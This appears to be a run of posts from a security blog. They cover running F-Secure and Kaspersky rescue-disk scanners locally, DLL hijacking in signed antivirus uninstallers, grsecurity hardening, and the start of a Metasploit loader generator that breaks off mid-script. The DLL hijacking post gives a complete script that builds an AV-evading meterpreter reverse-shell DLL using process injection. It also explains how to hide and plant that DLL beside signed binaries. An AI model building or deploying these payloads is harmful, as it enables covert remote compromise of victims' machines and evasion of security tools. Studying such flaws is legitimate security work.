drwxr-xr-x 2 user user 4096 Jun 26 2012 etc
-rw-r--r-- 1 user user 2116 Jun 26 2012 install.log
drwxr-xr-x 3 user user 4096 Jun 26 2012 lib
drwxr-xr-x 2 user user 4096 Jun 26 2012 libexec
drwxr-xr-x 2 user user 4096 Jun 26 2012 man
drwxr-xr-x 2 user user 4096 Jun 26 2012 modules
drwxr-xr-x 2 user user 4096 Jun 26 2012 sbin

./opt/f-secure/fssp/bin:
total 208
-rwxr-xr-x 1 user user 5060 Jun 26 2012 clstate_generator
-rwxr-xr-x 1 user user 416 Jun 26 2012 clstate_update
-rwxr-xr-x 1 user user 3724 Jun 26 2012 clstate_updated.rc
-rwxr-xr-x 1 user user 23911 Jun 26 2012 dbupdate
-rwxr-xr-x 1 user user 7133 Jun 26 2012 dbupdate_lite
-rwxr-xr-x 1 user user 142560 Jun 26 2012 fsav
-rwxr-xr-x 1 user user 11155 Jun 26 2012 fsdiag
-rwxr-xr-x 1 user user 4724 Jun 26 2012 licensetool

./opt/f-secure/fssp/databases:
total 0

./opt/f-secure/fssp/etc:
total 12
-rwxr-xr-x 1 user user 2713 Jun 26 2012 fsavd
-rwxr-xr-x 1 user user 4127 May 28 2012 fsupdate

./opt/f-secure/fssp/lib:
total 4016
-rw-r--r-- 1 user user 2475 Jun 26 2012 fsavdsimple.pm
-rwxr-xr-x 1 user user 91173 Jun 26 2012 fsavdsimple.so
-rw-r--r-- 1 user user 32196 Jun 26 2012 fssp-common
-rwxr-xr-x 1 user user 244324 Jun 26 2012 libdaas2.so
-rwxr-xr-x 1 user user 123748 Jun 26 2012 libdaas2tool.so
-rwxr-xr-x 1 user user 1705956 Jun 26 2012 libfm.so
-rwxr-xr-x 1 user user 74872 Jun 26 2012 libfsavd.so
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.4 -> libfsavd.so.4.0.0
-rwxr-xr-x 1 user user 66648 Jun 26 2012 libfsavd.so.4.0.0
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.5 -> libfsavd.so.5.0.0
-rwxr-xr-x 1 user user 70744 Jun 26 2012 libfsavd.so.5.0.0
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.6 -> libfsavd.so.6.0.0
-rwxr-xr-x 1 user user 192806 Jun 26 2012 libfsavd.so.6.0.0
lrwxrwxrwx 1 user user 13 Jul 24 19:25 libfsclm.so -> libfsclm.so.2
lrwxrwxrwx 1 user user 18 Jul 24 19:25 libfsclm.so.2 -> libfsclm.so.2.2312
-rwxr-xr-x 1 user user 309724 Jun 26 2012 libfsclm.so.2.2312
lrwxrwxrwx 1 user user 20 Jul 24 19:25 libfsmgmt.2.so -> libmgmtfile.2.0.0.so
-rwxr-xr-x 1 user user 27272 Jun 26 2012 libfssysutil.so
-rwxr-xr-x 1 user user 27272 Jun 26 2012 libfssysutil.so.0
-rwxr-xr-x 1 user user 40108 Jun 26 2012 libgcc_s-3.4.6-20060404.so.1
lrwxrwxrwx 1 user user 28 Jul 24 19:25 libgcc_s.so.1 -> libgcc_s-3.4.6-20060404.so.1
-rw-r--r-- 1 user user 44308 Jun 26 2012 libkeycheck.so
-rwxr-xr-x 1 user user 55936 Jun 26 2012 libmgmtfile.2.0.0.so
-rwxr-xr-x 1 user user 56420 Jun 26 2012 libmgmtfsma.2.0.0.so
lrwxrwxrwx 1 user user 18 Jul 24 19:25 libstdc++.so.6 -> libstdc++.so.6.0.3
-rwxr-xr-x 1 user user 806176 Jun 26 2012 libstdc++.so.6.0.3
-rwxr-xr-x 1 user user 94660 Jun 26 2012 libsubstatus.1.0.0.so
lrwxrwxrwx 1 user user 21 Jul 24 19:25 libsubstatus.1.so -> libsubstatus.1.0.0.so
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libsubstatus.so -> libsubstatus.1.so
-rw-r--r-- 1 user user 2696 Jun 26 2012 safe_rm
drwxr-xr-x 2 user user 4096 Jun 26 2012 x86_64

./opt/f-secure/fssp/lib/x86_64:
total 240
lrwxrwxrwx 1 user user 13 Jul 24 19:25 libfsavd.so -> libfsavd.so.6
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.6 -> libfsavd.so.6.0.0
-rwxr-xr-x 1 user user 243306 Jun 26 2012 libfsavd.so.6.0.0

./opt/f-secure/fssp/libexec:
total 2876
-rwxr-xr-x 1 user user 11176 Jun 26 2012 daas2verify
-rwxr-xr-x 1 user user 69316 Jun 26 2012 dbtool
-rwxr-xr-x 1 user user 3346 Jun 26 2012 fslmalerter
-rwxr-xr-x 1 user user 2723981 Jun 26 2012 fsupdated
-rwxr-xr-x 1 user user 4127 May 28 2012 fsupdated.rc
-rwxr-xr-x 1 user user 63108 Jun 26 2012 license-check
-rwxr-xr-x 1 user user 56796 Jun 26 2012 mgmtpipe

./opt/f-secure/fssp/man:
total 72
-rw-r--r-- 1 user user 3690 Jun 26 2012 dbupdate.8
-rw-r--r-- 1 user user 38643 Jun 26 2012 fsav.1
-rw-r--r-- 1 user user 21307 Jun 26 2012 fsavd.8
-rw-r--r-- 1 user user 0 Jun 26 2012 manpage.links
-rw-r--r-- 1 user user 27 Jun 26 2012 manpage.refs

./opt/f-secure/fssp/modules:
total 4
-rw-r--r-- 1 user user 334 Jun 26 2012 fslmalerter.config

./opt/f-secure/fssp/sbin:
total 496
-rwxr-xr-x 1 user user 327116 Jun 26 2012 fsavd
-rwxr-xr-x 1 user user 1331 Jun 26 2012 fssp-config
-rwxr-xr-x 1 user user 167456 Jun 26 2012 monitor
-rwxr-xr-x 1 user user 779 Jun 26 2012 uninstall-fssp
-rwxr-xr-x 1 user user 1540 Jun 26 2012 validate_permissions.sh

./var:
total 4
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt

./var/opt:
total 4
drwxr-xr-x 4 user user 4096 Jun 26 2012 f-secure

./var/opt/f-secure:
total 8
drwxr-xr-x 5 user user 4096 Jun 26 2012 fsaua
drwxr-xr-x 7 user user 4096 Jun 26 2012 fssp

./var/opt/f-secure/fsaua:
total 16
drwxr-xr-x 5 user user 4096 Jun 26 2012 data
-rw------- 1 user user 0 Jun 26 2012 fsauadbg.log
-rw------- 1 user user 922 Jun 26 2012 fsaua.log
drwxr-xr-x 2 user user 4096 Jun 26 2012 run
drwxr-xr-x 2 user user 4096 Jun 26 2012 tmp

./var/opt/f-secure/fsaua/data:
total 20
-rw------- 1 user user 142 Jun 26 2012 bwstate_fsbwserver.f-secure.com_80
-rw------- 1 user user 142 Jun 26 2012 bwstate_fsbwserver.f-secure.com_80_backup
drwxr-xr-x 2 user user 4096 Jun 26 2012 content
drwxr-xr-x 2 user user 4096 Jun 26 2012 header
drwxr-xr-x 2 user user 4096 Jun 26 2012 subscriptions

./var/opt/f-secure/fsaua/data/content:
total 0

./var/opt/f-secure/fsaua/data/header:
total 0

./var/opt/f-secure/fsaua/data/subscriptions:
total 16
-rw------- 1 user user 207 Jun 26 2012 auatool_aquapacked
-rw------- 1 user user 207 Jun 26 2012 auatool_hydralinux
-rw------- 1 user user 205 Jun 26 2012 auatool_rescuecd
-rw------- 1 user user 171 Jun 26 2012 SBST_fmlibunix

./var/opt/f-secure/fsaua/run:
total 0
-rw-r--r-- 1 user user 0 Jun 26 2012 fsaua_run_lock

./var/opt/f-secure/fsaua/tmp:
total 0

./var/opt/f-secure/fssp:
total 28
-rw-r--r-- 1 user user 58 Jun 26 2012 aua_api.log
drwxr-xr-x 3 user user 4096 Jun 26 2012 auth
drwxr-xr-x 6 user user 4096 Jun 26 2012 databases
-rw-r--r-- 1 user user 465 Jun 26 2012 dbupdate.log
drwxr-xr-x 2 user user 4096 Jun 26 2012 log
drwxr-xr-x 2 user user 4096 Jun 26 2012 run
drwxr-xr-x 2 user user 4096 Jun 26 2012 update

./var/opt/f-secure/fssp/auth:
total 4
drwxr-xr-x 3 user user 4096 Jun 26 2012 global

./var/opt/f-secure/fssp/auth/global:
total 4
drwxr-xr-x 2 user user 4096 Jun 26 2012 acl

./var/opt/f-secure/fssp/auth/global/acl:
total 8
-rw-r--r-- 1 user user 367 Jun 26 2012 fsc_revoke_hq.acl
-rw-r--r-- 1 user user 3055 Jun 26 2012 fsc_root.acl

./var/opt/f-secure/fssp/databases:
total 16
drwxr-xr-x 2 user user 4096 Jun 26 2012 aqualnx32.0
-rw-r--r-- 1 user user 0 Jun 26 2012 db.lock
drwxr-xr-x 2 user user 4096 Jun 26 2012 fmlibunix.0
drwxr-xr-x 2 user user 4096 Jun 26 2012 hydralinux.0
drwxr-xr-x 2 user user 4096 Jun 26 2012 orsplnx32.0

./var/opt/f-secure/fssp/databases/aqualnx32.0:
total 112
-rw-r--r-- 1 user user 111311 May 28 2012 libaqua32.so

./var/opt/f-secure/fssp/databases/fmlibunix.0:
total 1668
-rwxr-xr-x 1 user user 1705956 Jun 26 2012 libfm-lnx32.so

./var/opt/f-secure/fssp/databases/hydralinux.0:
total 14676
-rw-r--r-- 1 user user 703 Jun 26 2012 01@hydra.pub
-rw-r--r-- 1 user user 458 Jun 26 2012 02@hydra.mf
-rw-r--r-- 1 user user 206 Jun 26 2012 02@hydra.ref
-rw-r--r-- 1 user user 1524 Jun 26 2012 BW_datapak.bif
-rw-r--r-- 1 user user 326 Jun 26 2012 BW_datapak.bis
-rw-r--r-- 1 user user 37 Jun 26 2012 bw_name.html
-rw-r--r-- 1 user user 358 Jun 26 2012 enginefiles-fselinux.set
-rw-r--r-- 1 user user 10272526 Jun 26 2012 fsedb.dat
-rw-r--r-- 1 user user 199 Jun 26 2012 fselinux.cr
-rw-r--r-- 1 user user 202 Jun 26 2012 FS@hydra.ini
-rw-r--r-- 1 user user 225 Jun 26 2012 hydralinux-update.ini
-rw-r--r-- 1 user user 10354 Jun 26 2012 hydralinux-update.mf
-rw-r--r-- 1 user user 22127 Jun 26 2012 info.iad
-rw-r--r-- 1 user user 4673277 Jun 26 2012 libfsecr32-linux.so
-rw-r--r-- 1 user user 2331 Jun 26 2012 licenses-fselinux.txt

./var/opt/f-secure/fssp/databases/orsplnx32.0:
total 140
-rw-r--r-- 1 user user 140513 Mar 29 2012 liborsp32.so

./var/opt/f-secure/fssp/log:
total 4
-rw-r--r-- 1 user user 954 Jun 26 2012 fsupdated.log

./var/opt/f-secure/fssp/run:
total 8
-rw-r--r-- 1 user user 6 Jun 26 2012 fsupdated.pid
-rw-r--r-- 1 user user 6 Jun 26 2012 fsupdated.rc.pid

./var/opt/f-secure/fssp/update:
total 0

We are now ready to run an update like so :The command is

#/opt/f-secure/fssp/bin/dbupdate_lite

Finally we can scan files…

You can of-course customize the whole package to your needs, feel free to experiment ;)

Another great LiveCD is one from Kaspersky Labs called Kaspersky Rescue Disk 10 downloadable from here : rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

It is a powerful antivirus scanning engine with many interesting and useful tools, which I wanted to try running locally on my Debian amd64 host. Disassembling the ISO was a little more trickier than the one from F-Secure, for those interested I am posting a little howto on my progress. Of course there is a question why doing all this when I can just run the LiveCD with GUI and do everything from there ? In some cases it was more convenient for me to do manual scans from my local machine and it was just too much of a hassle to do this via LiveCD and VirtualBox, so I decided to extract the needed files from the LiveCD and try to run this separately.

First we download the Kaspersky Rescue Disk and mount the iso in our filesystem

# mount -o loop kav_rescue_10.iso /mnt/iso

Next we copy the following squashfs file from /mnt/iso/rescue/LiveOS/squashfs.img to some working directory @ home for example KASPERSKY

cp /mnt/iso/rescue/LiveOS/squashfs.img /home/user/KASPERSKY

Next we check what the file squashfs.img actually is

root@Obelix:/home/user/KAV# file squashfs.img 
squashfs.img: Squashfs filesystem, little endian, version 4.0, 32095920895 bytes, 3 inodes, blocksize: 7 bytes, created: Thu May 18 03:10:24 2034

We need quite recent squashfstools, and I would not recommend the version from Debian stable. Just download the sources from sourceforge.net/projects/squashfs/files/ , extract and modify the Makefile to enable xz compression support by uncommenting the following line

XZ_SUPPORT = 1

In order to compile with xz support we need some additional libs so on Debian I did

apt-get install liblzma-dev
apt-get install libzma
apt-get install xz-lzma

Now we do make and if the compilation was successful we can copy the unsquashfs binary to /usr/local/bin

cp unsquashfs /usr/local/bin

Now we can extract the squashfs.img file copied from the CD

root@Obelix:/home/user/KASPERSKY# unsquashfs squashfs.img 
Parallel unsquashfs: Using 4 processors
1 inodes (474 blocks) to write

[====================================================|] 474/474 100%
created 1 files
created 2 directories
created 0 symlinks
created 0 devices
created 0 fifos
root@Obelix:/home/user/KASPERSKY#

OK, we end up with a directory squashfs-root containing LiveOS subdirectory which contains another compressed image

root@Obelix:/home/user/KASPERSKY/squashfs-root/LiveOS# file ext3fs.img 
ext3fs.img: Linux rev 1.0 ext3 filesystem data, UUID=85dd4ebe-fd1b-420b-8d20-bef37149b4ec

We can now mount this file using regular linux mount command like so ..

mount -o loop ext3fs.img /mnt/disk

Next we copy the whole contents from the /mnt/disk to our home working dir KASPERSKY

cp -rv /mnt/disk /home/user/KASPERSKY

Once finished chown the whole directory to your user so you can edit files. OK we are almost there, because the Kaspersky Antivirus Engine for Linux is compiled in such a way the it relies on a lot of custom libraries from Kaspersky Labs there are some scripts that load the GUI scanner and the are located in /home/user/KASPERSKY/disk/usr/bin   The file we are interested in is kav.exe a shell script that does LD_LIBRARY_PATH stuff etc so proper libraries are used when the application is launched. I decided not to touch these scripts as it proved very difficult to modify.  If we try to run the script locally like this

user@Obelix:~/KASPERSKY/disk/usr/bin$ ./kav.exe 
./kav.exe: line 3: script_l10n.sh: No such file or directory
./kav.exe: line 37: source: /var/log/winsysdir: is a directory
./kav.exe: line 38: /usr/lib/kl/kav: No such file or directory

We can see that the script looks in its designed folders, so lets try chroot the directory and see what we get. Before we run chroot, copy over the /etc/resolv.conf to /home/user/KASPERSKY/disk/etc so that the chrooted system can resolve DNS. Also an important note is to create custom mountpoints for the chroot environment in the /home/user/KASPERSKY/disk/discs directory

mkdir /home/user/KASPERSKY/disk/discs/disk0
mkdir /home/user/KASPERSKY/disk/discs/disc1 
mkdir /home/user/KASPERSKY/disk/discs/disk2
mkdir /home/user/KASPERSKY/disk/discs/disk3
#

and mount whatever directory you wish to scan with Kaspersky

mount -o bind /directory/to/scan /home/user/KASPERSKY/disk/discs/disk0

Now we are ready to chroot to the extracted filesystem..

root@Obelix:/home/user/KASPERSKY# chroot disk/
Obelix / #

OK, this worked, lets try and run the kav.exe shell script..

Obelix bin # ./kav.exe 
grep: /proc/cmdline: No such file or directory
./kav.exe: line 37: source: /var/log/winsysdir: is a directory
No protocol specified
No protocol specified
rd: cannot connect to X server :0.0

OK, we need to set the chroot display system to be identical with our root display on the host X server and provide access to it.  On the host you need to enable it from a terminal like this:

 user@Obelix:~$ xhost +
access control disabled, clients can connect from any host

And in the chroot system set the DISPLAY variable like this:

Obelix bin # export DISPLAY=:0.0

Now we can try and run the kav.exe binary

It works, so we can now update the AV signatures either from the console or via GUI, I choose console before the kav.exe is executed

Obelix bin # ./kav_update 
grep: /proc/cmdline: No such file or directory
./kav_update: line 12: source: /var/log/winsysdir: is a directory
2013-07-25 1x:x6:xx     Updater                   starting   0%         
; --- Settings ---
; Notify before update: Yes
; Rescan quarantine:    No
; Update sources:
; 
; ------------------
2013-07-25 1x:x6:xx     Task started event  
2013-07-25 1x:x6:xx     Update source is selected http://dnl-10.geo.kaspersky.com/ 
2013-07-25 1x:x6:xx     Updater                   running    0%         
2013-07-25 1x:x6:xx     File downloaded index/u0607g.xml.dif 
2013-07-25 1x:x6:xx     Generate list of files to download  
2013-07-25 1x:x6:xx     File downloaded index/../bases/av/kdb/i386/kdb-i386-1211g.xml.dif 
2013-07-25 1x:x6:xx       
2013-07-25 1x:x6:xx     Updater                   completed             
;  --- Statistics ---
; Time Start:           2013-07-25 1x:x6:xx
; Time Finish:          2013-07-25 1x:x6:xx
; Completion:           100%
; Estimated traffic size:       11798
; Downloaded size:      11798
; Speed:        76.81 KB/sec
;  ------------------
Obelix bin #

Now lets test the Antivirus against some Metasploit generated payloads for example…

As you can see it does its job, compared with the F-Secure setup from the last article

root@Obelix:/opt/f-secure/fssp/bin# ./fsav /home/user/Malware/
F-Secure Security Platform version 2.50  build 12970

Scan started at Thu Jul 25 1x:x6:xx 2013
Database version: 2013-07-24_07

/home/user/Malware/test1.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test1.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/test1.exe: [disinfect failed]
/home/user/Malware/test1.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test1.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/test1.exe: [rename failed]
/home/user/Malware/ComplexPath.exe: Infected: Trojan.GenericKDZ.20684 [Aquarius]
/home/user/Malware/ComplexPath.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/ComplexPath.exe: [disinfect failed]
/home/user/Malware/ComplexPath.exe: Infected: Trojan.GenericKDZ.20684 [Aquarius]
/home/user/Malware/ComplexPath.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/ComplexPath.exe: [rename failed]
/home/user/Malware/test2.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test2.exe: Disinfect? (Yes, No, yes to All) No
/home/user/Malware/test2.exe: [disinfect failed]
/home/user/Malware/test2.exe: Infected: Backdoor.Shell.AC [Aquarius]
/home/user/Malware/test2.exe: Rename? (Yes, No, yes to All) No
/home/user/Malware/test2.exe: [rename failed]

Scan ended at Thu Jul 25 1x:x6:xx 2013
4 files scanned
3 files infected

Both AVs perform well, I still prefer the F-Secure though.

Well, this issue has been discussed many times already dating a few years back. A good description on this was originally published by HD Moore here : community.rapid7.com/community/metasploit/blog/2010/08/22/exploiting-dll-hijacking-flaws   There are many vulnerable applications out there, but in my recent research I wanted to check out how some security companies audit their software before release.  In a pentest scenario I wanted to use some digitally signed binary from some renounced AV vendor to load a custom crafted meterpreter Dll thus bypassing some sandboxing techniques. While some vendors proved to have good code, some to my surprise contain some Dll hijacking flaws (and digitally signed by the vendor) My testing scenario was a guest system running Windows 7 SP1 64bit in VirtualBox and a  Linux host with metasploit.  Lets see what the results were…

I have decided to have a close look at the Uninstall/Remove  utilities/tools  from various AV vendors. These files are always some signed single binaries or they are a self-extracting executable containing a few other files which are digitally signed. First one I chose to test was an Avast! Uninstall Utility (just Google it). It is a single executable file,digitally signed, designed to remove Avast products from Windows. It is called aswclear.exe   Next I have checked the executable via Sysinternalssuite Procmon.exe to actually see what the file is doing, what Dlls is it loading etc.. And I have found an interesting part here :

The executable is trying to load a dll called UxTheme.dll first from its path, then it goes on to search for Windows Dll folders. So what if we use a specially crafted meterpreter dll, call it UxTheme.dll and put it alongside the executable ? It gets loaded by the aswclear.exe, but because we use a meterpreter dll the program just exits and on  the Linux listener box we get a reverse shell…

For the specially crafted Dll I have created a custom generator that creates a C source code for the meterpreter dll (the Metasploit generated Dll gets flagged by almost every AV that I know)

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       By Astr0baby 2012                       Dll fun         " 
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port 
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c" 
read enumber
./msfpayload windows/meterpreter/reverse_tcp_dns  LHOST=$IP LPORT=$port EXITFUNC=thread R |./msfencode -e  x86/shikata_ga_nai  -c 1 -t raw |  ./msfencode -e  x86/fnstenv_mov -c $enumber -t raw | ./msfencode -e  x86/shikata_ga_nai  -c $enumber -t raw | ./msfencode -e  x86/jmp_call_additive -c 1 -t raw | ./msfencode -e x86/alpha_mixed -b '\x00'  > test.c 

mkdir ShellCode/Dll 
mv test.c ShellCode/Dll 
cd ShellCode/Dll 

#We prepare the shellcode file to something usable using sed magic
sed -e 's/+/ /g' test.c > test2.c
sed -e 's/buf = //g' test2.c > final.c 
cat final.c >> clean.c

#Lets generate some files now 
#Generating template.h 
echo '#define SCSIZE 8196' > template.h
echo 'unsigned char function[SCSIZE] =' >> template.h 
cat clean.c >> template.h 
echo ';' >> template.h 

#Generating main template.c 
echo '#include <windows.h>' > template.c 
echo '#include "template.h"' >> template.c 
echo '#if BUILDMODE == 2' >> template.c 
echo 'void inline_bzero(void *p, size_t l)' >> template.c
echo '{' >> template.c
echo 'BYTE *q = (BYTE *)p;' >> template.c
echo 'size_t x = 0;' >> template.c
echo 'for (x = 0; x < l; x++)' >> template.c
echo '*(q++) = 0x00;' >> template.c
echo '}' >> template.c
echo '#endif' >> template.c
echo 'void ExecutePayload(void);' >> template.c
echo 'BOOL WINAPI' >> template.c
echo 'DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)' >> template.c
echo '{' >> template.c
echo 'switch (dwReason)' >> template.c
echo '{' >> template.c
echo 'case DLL_PROCESS_ATTACH:' >> template.c
echo ' ExecutePayload();' >> template.c
echo ' break;' >> template.c
echo 'case DLL_PROCESS_DETACH:' >> template.c
echo 'break;' >> template.c
echo 'case DLL_THREAD_ATTACH:' >> template.c
echo 'break;' >> template.c
echo ' case DLL_THREAD_DETACH:' >> template.c
echo 'break;' >> template.c
echo '}' >> template.c
echo 'return TRUE;' >> template.c
echo '}' >> template.c
echo 'void ExecutePayload(void) {' >> template.c
echo 'int error;' >> template.c
echo 'PROCESS_INFORMATION pi;' >> template.c
echo 'STARTUPINFO si;' >> template.c
echo 'CONTEXT ctx;' >> template.c
echo 'DWORD prot;' >> template.c
echo 'LPVOID ep;' >> template.c
echo 'inline_bzero( &si, sizeof( si ));' >> template.c
echo 'si.cb = sizeof(si);' >> template.c
echo 'if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {' >> template.c
echo ' ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;' >> template.c
echo 'GetThreadContext(pi.hThread, &ctx);' >> template.c
echo ' ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> template.c
echo 'WriteProcessMemory(pi.hProcess,(PVOID)ep, &function, SCSIZE, 0);' >> template.c
echo '#ifdef _WIN64' >> template.c
echo 'ctx.Rip = (DWORD64)ep;' >> template.c
echo '#else' >> template.c
echo 'ctx.Eip = (DWORD)ep;' >> template.c 
echo '#endif' >> template.c
echo 'SetThreadContext(pi.hThread,&ctx);' >> template.c
echo 'ResumeThread(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hProcess);' >> template.c
echo '}' >> template.c
echo 'ExitThread(0);' >> template.c 
echo '}' >> template.c 
todos <template.c> TEMPLATE.c
todos <template.h> TEMPLATE.h
#Generating build.bat
echo '@echo off' > build.bat
echo 'cl.exe template.c -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib' >> build.bat 
echo 'del *.def' >> build.bat
echo 'del *.h' >> build.bat
echo 'del *.rc' >> build.bat
echo 'del *.c' >> build.bat
echo 'del *.obj' >> build.bat 
todos <build.bat> BUILD.bat
rm template.c 
rm template.h
rm build.bat 
rm clean.c 
rm final.c 
rm test2.c 
rm test.c 
#Finished 
echo 'All files generated in ShellCode\Dll folder, please copy the Dll to WinBox with Visual Studio 2010 and run compile.bat' 
cd .. 
cd ..

This script generates 3 files in ShellCode/dll folder which can be compiled using Visual Studio C++ 2010/2012. So once we have the Dll and the aswclear.exe we can for example hide the meterpreter UxTheme.dll via attrib commands and pack it together with aswcler.exe in a zip. Simple attrib +h +s +r UxTheme.dll will hide the file from default explorer settings and cmd.exe dir commands…

Some Sandbox technologies blindly trust Digitally signed executables and do not check what Dlls they load.

I have checked the following Vendor removal tools for Dll path flaws.

• Kaspersky – kavremover.exe is flawed with exactly the same Dll problem like the above example
• Panda – uninstaller.exe is a self extracting exe containing a few dlls and exes, one is flawed.
• F-Secure – uitool UninstallationTool.exe – fine
• AVG – AVG Remover – fine

Finally a short video for a little demonstration

.

While playing around with all those meterpreter binary payloads on Linux either in virtual environment or on a live system an important question comes to mind, how to prevent this from executing on my machine ? I do not wish to get too technical here about this and I am sure this is nothing new really, nevertheless the best at what I could get my hands on are GRSEC patches, period.

I have never used it before on my desktop (Debian 64bit) so I have decided to give it a try after seeing an interesting Finnish LiveCD Digabi  http://sourceforge.net/projects/digabi/ which is a Live-Linux distro for The Matriculation Examination Board of Finland.

Installation is pretty straightforward to those that have compiled a custom kernel before. Download grsecurity patches from their site @ http://grsecurity.net/download.php  for both 2.6.x and 3.2.x stable branches of the Linux kernel, patch the kernel

# cd linux-3.2.x
# patch -p1 < ../grsecurity-2.9.1-3.2xxxxxx.patch

While my Debian system was using a backport Debian kernel vmlinuz-3.2.0-0.bpo.2-amd64 I decided to use its config-3.2.0-bpo.2-amd64 and use it via #make oldconfig when compiling the grsec-patched kernel. During make oldconfig I was asked to add additional options that were missing from the backport kernel 3.2.0-0.bpo.2-amd64 and which were present in the 3.2.51 vanilla + grsec patches.

One should read the documentation about the Grsecurity/PAX configuration options here
On Debian I have done the following to compile the kernel

# fakeroot make deb-pkg

Once compiled, install the deb package (it can get quite big  as the debugging symbols have not been stripped out) and boot into the new kernel.

What I tested first was the following:

Metasploit generated executable payloads

• ShellcodeExecute with Alpha encoded payload inside the executable -  gcc compiled
• msfencode -t elf -e x86/shikata_ga_nai >> executable (reverse_tcp)
• unsigned char shellcode[]=  – gcc compiled

Metaploit win32 executable payload for Windows to be executed via wine.

• ShellcodeExecute with Alpha encoded payload inside the executable -  Visual Studio compiled
• msfencode -t exe (various types)
• unsigned char shellcode[]= Visual Studio compiled

None of the payloads work with the default GRSEC/PAX settings in the patched kernel. Here are some console outputs for the reference:

user@Obelix:~/stuff/metasploit/ShellCode$ ./Executive

dmesg….

[ 9311.625455] PAX: execution attempt in: /dev/zero (deleted), e8fc0000-e8fc1000 00000000
[ 9311.625462] PAX: terminating task: /home/user/stuff/metasploit/ShellCode/Executive(Executive):8527, uid/euid: 1000/1000, PC: 00000000e8fc0000, SP: 00000000f7234d5c
[ 9311.625466] PAX: bytes at PC: 89 e7 db d1 d9 77 f4 5a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 4a 43
[ 9311.625478] PAX: bytes at SP-8: 00000579 f7234d88 08048523 e8fc0000 08049750 00000579 00001000 e8f9aff4 0804971c f7234d88 e8f9aff4 00000000 00000000 f7234da8 0804855f 08049750 e8f9aff4 08048580 f7234db8 e8e878a5 f7234dc0 f7234e38

user@Obelix:~/Malware$ wine test.exe
err:virtual:map_image failed to set 60000020 protection on section .text, noexec filesystem?
Killed

dmesg
[ 9354.532356] PAX: execution attempt in: <anonymous mapping>, 00401000-0041a000 00401000
[ 9354.532360] PAX: terminating task: /usr/local/bin/wine-preloader(test.exe):8553, uid/euid: 1000/1000, PC: 0000000000414000, SP: 000000000032fe74
[ 9354.532362] PAX: bytes at PC: e8 08 00 00 00 6a 00 ff 15 50 90 41 00 55 89 e5 81 ec 34 01
[ 9354.532369] PAX: bytes at SP-8: 00000000 00000000 e326d08c 7ffdf000 00000000 e32ab5f0 7ffdf000 0032fec8 e327062b 7ffdf000 00414000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 e340d86c f1f66d74

Some additional things that I wanted to mention is that VirtualBox will not work with grsec patched kernel. No problem with that, I wanted to get rid of it anyway so I have migrated all my vbox images to KVM qcow2 format, KVM works perfectly under grsec kernel.

Also it is important to stress that some desktop applications need some exceptions from PAX in order to work correctly. In order to make these exceptions you need to install paxclt tool to modify individual binaries in order to make them run under grsec-kernel

Firefox

root@Obelix:/home/user/firefox# paxctl -v firefox
PaX control v0.5
Copyright 2004,2005,2006,2007 PaX Team <pageexec@freemail.hu>
- PaX flags: —–m-x-e– [firefox]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled

root@Obelix:/home/user/firefox# paxctl -v firefox-bin
PaX control v0.5
Copyright 2004,2005,2006,2007 PaX Team <pageexec@freemail.hu>

- PaX flags: —–m-x-e– [firefox-bin]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled

In order to modify the PaX flags of the above binaries run the following

#paxctl -C binary 
#paxctl -m binary

In order for flash to work (and other plugins possibly) you need to do the same to the plugin-container executable as well as the libflashplayer.so

Some programs that need the above paxctl mods are: OpenOffice, Skype, Remina, Opera…

Grsec is a great way to harden your Linux Box, especially when doing any kind of security research.

This sounds crazy, but I have thought of improving a little an already well made code for meterpreter-loader for Windows targets. Based on the work from Raphael Mudge I have decided to create a little C source code generator that would include hardcoded IP address and port number for our Metasploit server. While the original concept is very good, some automation would be nice. The original article is here : blog.strategiccyber.com/2012/09/13/a-loader-for-metasploits-meterpreter/

The original source code on Github is here :  github.com/rsmudge/metasploit-loader

My modifications are simple, I have added a hardcoded unsigned char variables that get placed into the source code, so that when the final binary gets executed it silently connects to the Metasploit server and loads your favorite windows reverse_tcp payload.

Lets get customized !

Here is the code, you can place the shellscript anywhere, just make sure you have mingw installed on your linuxbox.

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"  
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port 

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <windows.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
